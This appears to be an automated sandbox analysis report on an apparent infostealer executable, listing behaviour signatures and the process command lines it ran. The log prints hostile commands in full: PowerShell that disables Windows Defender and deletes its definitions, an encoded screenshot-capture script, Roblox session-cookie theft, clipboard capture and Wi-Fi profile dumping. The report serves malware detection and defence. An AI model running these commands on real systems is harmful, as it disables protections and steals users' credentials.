Analysis Overview
SHA256
39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00
Threat Level: Shows suspicious behavior
The file 39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00 was found to be: Shows suspicious behavior.
Malicious Activity Summary
Clipboard Data
Loads dropped DLL
Unsecured Credentials: Credentials In Files
Reads user/profile data of web browsers
Executes dropped EXE
Obfuscated Files or Information: Command Obfuscation
Accesses cryptocurrency files/wallets, possible credential harvesting
Command and Scripting Interpreter: PowerShell
Looks up external IP address via web service
Enumerates processes with tasklist
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
System Network Configuration Discovery: Wi-Fi Discovery
Browser Information Discovery
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Detects videocard installed
Gathers system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-04 21:29
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-04 21:29
Reported
2024-11-04 21:31
Platform
win10v2004-20241007-en
Max time kernel
139s
Max time network
142s
Command Line
Signatures
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\DarkEngine.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
"C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\DarkEngine.exe
C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lb5mhvf0\lb5mhvf0.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD55.tmp" "c:\Users\Admin\AppData\Local\Temp\lb5mhvf0\CSC7907DE345AD406BBA96EF39B4AEEAC9.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
